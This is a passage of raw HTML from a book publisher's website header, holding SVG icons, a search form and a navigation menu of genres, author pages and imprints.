	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0ZM31.83,26.72a1.57,1.57,0,0,1-.36,1,.55.55,0,0,1-.21.21,1.44,1.44,0,0,1-1,.36H8.45a1.5,1.5,0,0,1-1-.37.58.58,0,0,1-.2-.21,1.5,1.5,0,0,1-.35-1V12a1.59,1.59,0,0,1,.36-1,.74.74,0,0,1,.29-.27,1.39,1.39,0,0,1,.89-.31H30.29a1.5,1.5,0,0,1,.7.18l0-.05.66.63-.06,0a1.58,1.58,0,0,1,.21.78Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M24.08,18.62l6.29,7.48V12.62a.64.64,0,0,0,0-.09Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
						</ul>
	<div class="mobile-search">
		
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.hachettebookgroup.com/">
		<label class="site-search__label" for="search-form-6268153e98f1b">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input add-autocomplete" type="search" id="search-form-6268153e98f1b" value="" placeholder="Search the website for a title or author" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-3804657819  desc-search-icon-3711733861">
	<title id="title-search-icon-3804657819">Search</title>
	<desc id="desc-search-icon-3711733861">magnifying glass graphic</desc>
	<path class="cls-2" d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
	</div>
</div>
<div class="site-header__default site-header__nav-search-container">
	<div class="menu-hachette-primary-menu-container"><nav class="site-header__nav"><ul id="menu-hachette-primary-menu" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genres/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Genres">Genres</a><span id="expand-site-header__sub-menu-256942695" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-256942695" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-256942695" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-769256717  desc-arrow-2803045871">
	<title id="titlet-arrow-769256717">Arrow Icon</title>
	<desc id="desc-arrow-2803045871">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-256942695" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-256942695"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/childrens-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Children&#039;s Books">Children&#039;s Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/cooking/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Cooking">Cooking</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/fiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Fiction">Fiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/mind-body-spirit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mind, Body, Spirit">Mind, Body, Spirit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/mystery-thriller/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mystery &amp; Thriller">Mystery &amp; Thriller</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/nonfiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Nonfiction">Nonfiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Romance">Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/sci-fi-fantasy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sci-Fi &amp; Fantasy">Sci-Fi &amp; Fantasy</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/teen-young-adult/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Teen &amp; Young Adult">Teen &amp; Young Adult</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Travel">Travel</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Authors">Authors</a><span id="expand-site-header__sub-menu-1328118378" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1328118378" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1328118378" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-435538301  desc-arrow-2473796431">
	<title id="titlet-arrow-435538301">Arrow Icon</title>
	<desc id="desc-arrow-2473796431">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1328118378" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1328118378"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/contributor/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Our Authors">Our Authors</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-events/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Events">Author Events</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/imprints/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-288162434" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-288162434" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-288162434" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3452229990  desc-arrow-2566615048">
	<title id="titlet-arrow-3452229990">Arrow Icon</title>
	<desc id="desc-arrow-2566615048">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-288162434" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-288162434"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Grand Central Publishing">Grand Central Publishing</a><span id="expand-site-header__sub-menu-1369619926" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1369619926" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1369619926" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2887211087  desc-arrow-3195255519">
	<title id="titlet-arrow-2887211087">Arrow Icon</title>
	<desc id="desc-arrow-3195255519">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1369619926" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1369619926"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/legacy-lit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve Books">Twelve Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit Publishing">Orbit Publishing</a><span id="expand-site-header__sub-menu-265074710" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-265074710" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-265074710" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3998342052  desc-arrow-204733736">
	<title id="titlet-arrow-3998342052">Arrow Icon</title>
	<desc id="desc-arrow-204733736">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-265074710" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-265074710"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/orbit/page/orbit-catalog/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Orbit">Orbit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/redhook/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Redhook">Redhook</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Audio">Hachette Audio</a><span id="expand-site-header__sub-menu-706051192" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-706051192" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-706051192" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1138476505  desc-arrow-3978709494">
	<title id="titlet-arrow-1138476505">Arrow Icon</title>
	<desc id="desc-arrow-3978709494">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-706051192" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-706051192"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-audio/wattpad/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wattpad">Wattpad</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Nashville">Hachette Nashville</a><span id="expand-site-header__sub-menu-1037910405" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1037910405" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1037910405" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3872360914  desc-arrow-312368835">
	<title id="titlet-arrow-3872360914">Arrow Icon</title>
	<desc id="desc-arrow-312368835">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1037910405" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1037910405"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/center-street/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Center Street">Center Street</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/faithwords/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="FaithWords">FaithWords</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/hachette-nashville/worthy-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Worthy Books">Worthy Books</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown and Company">Little, Brown and Company</a><span id="expand-site-header__sub-menu-1259500162" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1259500162" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1259500162" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1445835732  desc-arrow-249394707">
	<title id="titlet-arrow-1445835732">Arrow Icon</title>
	<desc id="desc-arrow-249394707">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1259500162" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1259500162"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little Brown Spark">Little Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Books for Young Readers">Little, Brown Books for Young Readers</a><span id="expand-site-header__sub-menu-2037402737" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-2037402737" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-2037402737" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-4099227989  desc-arrow-253727356">
	<title id="titlet-arrow-4099227989">Arrow Icon</title>
	<desc id="desc-arrow-253727356">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-2037402737" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-2037402737"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/christy-ottaviano-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Christy Ottaviano Books">Christy Ottaviano Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/jimmy-patterson/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="JIMMY Patterson">JIMMY Patterson</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/lb-kids/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="LB Kids">LB Kids</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/little-brown-books-for-young-readers/poppy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Poppy">Poppy</a></span></li>	</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Perseus">Perseus</a><span id="expand-site-header__sub-menu-307375647" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-307375647" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-307375647" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2393589008  desc-arrow-1286301">
	<title id="titlet-arrow-2393589008">Arrow Icon</title>
	<desc id="desc-arrow-1286301">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-307375647" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-307375647"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Avalon Travel">Avalon Travel</a><span id="expand-site-header__sub-menu-1982827484" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1982827484" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1982827484" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3185075756  desc-arrow-2063718411">
	<title id="titlet-arrow-3185075756">Arrow Icon</title>
	<desc id="desc-arrow-2063718411">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1982827484" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1982827484"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/moon-travel/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Moon Travel">Moon Travel</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/avalon-travel/rick-steves/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Rick Steves">Rick Steves</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/basic-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Basic Books">Basic Books</a><span id="expand-site-header__sub-menu-1347063863" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1347063863" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1347063863" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2515128245  desc-arrow-3295179921">
	<title id="titlet-arrow-2515128245">Arrow Icon</title>
	<desc id="desc-arrow-3295179921">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1347063863" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1347063863"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/basic-books/seal-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Seal Press">Seal Press</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Books">Hachette Books</a><span id="expand-site-header__sub-menu-952847879" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-952847879" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-952847879" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3682485370  desc-arrow-860384688">
	<title id="titlet-arrow-3682485370">Arrow Icon</title>
	<desc id="desc-arrow-860384688">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-952847879" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-952847879"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/hachette-books/hachette-go/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Hachette Go">Hachette Go</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="PublicAffairs">PublicAffairs</a><span id="expand-site-header__sub-menu-969024087" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-969024087" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-969024087" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-198611336  desc-arrow-2586211340">
	<title id="titlet-arrow-198611336">Arrow Icon</title>
	<desc id="desc-arrow-2586211340">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-969024087" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-969024087"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/bold-type-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Type Books">Bold Type Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/publicaffairs/the-economist/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Economist Books">Economist Books</a></span></li>		</ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Running Press">Running Press</a><span id="expand-site-header__sub-menu-517072409" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-517072409" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-517072409" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-473857155  desc-arrow-3278742159">
	<title id="titlet-arrow-473857155">Arrow Icon</title>
	<desc id="desc-arrow-3278742159">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-517072409" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-517072409"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/perseus/running-press/black-dog-leventhal/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Black Dog &amp; Leventhal">Black Dog &amp; Leventhal</a></span></li>		</ul>
</li>	</ul>
</li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Videos">Videos</a><span id="expand-site-header__sub-menu-977872798" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-977872798" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-977872798" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3761469658  desc-arrow-3275125880">
	<title id="titlet-arrow-3761469658">Arrow Icon</title>
	<desc id="desc-arrow-3275125880">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
